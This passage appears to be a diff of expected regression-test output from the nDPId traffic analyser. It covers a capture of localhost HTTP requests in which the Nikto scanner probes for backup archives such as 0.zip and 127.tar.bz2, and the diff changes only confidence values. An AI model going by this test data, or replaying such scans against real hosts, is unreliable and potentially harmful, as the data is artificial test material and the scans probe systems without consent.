00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1576420276888,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276888,"pkt":"AAAAAAAAAAAAAAAACABFAAC95a1AAEAGVot\/AAABfwAAAcKiH5DfWN3u+DsBkYAYAED+sQAAAQEICp1m+8CdZvvAR0VUIC8wLnppcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276888,"flow_last_seen":1576420276888,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276888,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49826,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276888,"flow_last_seen":1576420276888,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276888,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49826,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276890,"flow_last_seen":1576420276890,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49828,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1576420276890,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276890,"pkt":"AAAAAAAAAAAAAAAACABFAAC9vy5AAEAGfQp\/AAABfwAAAcKkH5Dme4drk\/tL44AYAED+sQAAAQEICp1m+8KdZvvCR0VUIC8wLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276890,"flow_last_seen":1576420276890,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49828,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276890,"flow_last_seen":1576420276890,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49828,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":143,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276891,"flow_last_seen":1576420276891,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276891,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49830,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1576420276891,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276891,"pkt":"AAAAAAAAAAAAAAAACABFAADF\/ZdAAEAGPpl\/AAABfwAAAcKmH5DYD8XTrc+7CoAYAED+uQAAAQEICp1m+8OdZvvDR0VUIC8xMjcuMC4wLjEudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":143,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276891,"flow_last_seen":1576420276891,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276891,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49830,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":143,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276891,"flow_last_seen":1576420276891,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276891,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49830,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276893,"flow_last_seen":1576420276893,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49832,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1576420276893,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276893,"pkt":"AAAAAAAAAAAAAAAACABFAADFI6xAAEAGGIV\/AAABfwAAAcKoH5Ar0hvuzfCq7oAYAED+uQAAAQEICp1m+8WdZvvFR0VUIC8xMjcuMC4wLjEudGFyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276893,"flow_last_seen":1576420276893,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49832,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276893,"flow_last_seen":1576420276893,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49832,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":145,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276894,"flow_last_seen":1576420276894,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276894,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49834,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1576420276894,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276894,"pkt":"AAAAAAAAAAAAAAAACABFAADDA5ZAAEAGOJ1\/AAABfwAAAcKqH5B\/mzvUPuYs44AYAED+twAAAQEICp1m+8adZvvGR0VUIC8xMjcudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276894,"flow_last_seen":1576420276894,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276894,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49834,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276894,"flow_last_seen":1576420276894,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276894,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49834,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":146,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276896,"flow_last_seen":1576420276896,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49836,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1576420276896,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276896,"pkt":"AAAAAAAAAAAAAAAACABFAADD\/SZAAEAGPwx\/AAABfwAAAcKsH5AB18VtW5jVeIAYAED+twAAAQEICp1m+8idZvvIR0VUIC8xMjcudGFyLmJ6MiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276896,"flow_last_seen":1576420276896,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49836,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276896,"flow_last_seen":1576420276896,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49836,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":147,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276897,"flow_last_seen":1576420276897,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276897,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49838,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1576420276897,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276897,"pkt":"AAAAAAAAAAAAAAAACABFAADFBrJAAEAGNX9\/AAABfwAAAcKuH5Ayaz75EQ6Mk4AYAED+uQAAAQEICp1m+8mdZvvJR0VUIC8xMjcuMC50YXIuYnoyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276897,"flow_last_seen":1576420276897,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276897,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49838,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276897,"flow_last_seen":1576420276897,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276897,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49838,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":148,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276900,"flow_last_seen":1576420276900,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276900,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49840,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1576420276900,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276900,"pkt":"AAAAAAAAAAAAAAAACABFAADFczBAAEAGyQB\/AAABfwAAAcKwH5A3G0tor3ywHoAYAED+uQAAAQEICp1m+8ydZvvMR0VUIC8xMjcuMC50YXIuYnoyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276900,"flow_last_seen":1576420276900,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276900,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49840,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276900,"flow_last_seen":1576420276900,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276900,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49840,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 